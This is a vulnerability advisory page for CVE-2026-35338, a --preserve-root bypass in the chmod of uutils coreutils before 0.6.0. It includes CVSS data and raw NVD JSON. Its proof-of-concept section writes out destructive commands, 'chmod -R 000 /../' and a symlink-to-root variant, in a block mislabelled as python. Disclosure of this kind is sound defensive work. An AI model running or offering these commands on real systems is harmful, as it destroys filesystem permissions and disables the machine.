Security Vulnerability Report
中文
CVE-2026-35338 CVSS 7.3 HIGH

CVE-2026-35338

Published: 2026-04-22 17:16:36
Last Modified: 2026-04-27 12:28:50
Source: [email protected]

Description

A vulnerability in the chmod utility of uutils coreutils allows users to bypass the --preserve-root safety mechanism. The implementation only validates if the target path is literally / and does not canonicalize the path. An attacker or accidental user can use path variants such as /../ or symbolic links to execute destructive recursive operations (e.g., chmod -R 000) on the entire root filesystem, leading to system-wide permission loss and potential complete system breakdown.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:* - VULNERABLE
uutils coreutils < 0.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Exploit: Bypass preserve-root using path traversal # Target: uutils coreutils chmod < 0.6.0 # Description: The path '/../' resolves to root but bypasses the literal '/' check. # Attempt to change permissions of root fs recursively using path traversal chmod -R 000 /../ # Alternatively using a symlink to bypass the check ln -s / tmp/rootlink chmod -R 000 tmp/rootlink # Result: System files permissions are set to 000, causing denial of service.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35338", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:35.583", "lastModified": "2026-04-27T12:28:50.307", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the chmod utility of uutils coreutils allows users to bypass the --preserve-root safety mechanism. The implementation only validates if the target path is literally / and does not canonicalize the path. An attacker or accidental user can use path variants such as /../ or symbolic links to execute destructive recursive operations (e.g., chmod -R 000) on the entire root filesystem, leading to system-wide permission loss and potential complete system breakdown."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.6.0", "matchCriteriaId": "87C33018-2E08-45B0-B69C-7FC224F7F883"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/pull/10033", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/uutils/coreutils/releases/tag/0.6.0", "source": "[email protected]", "tags": ["Release Notes"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.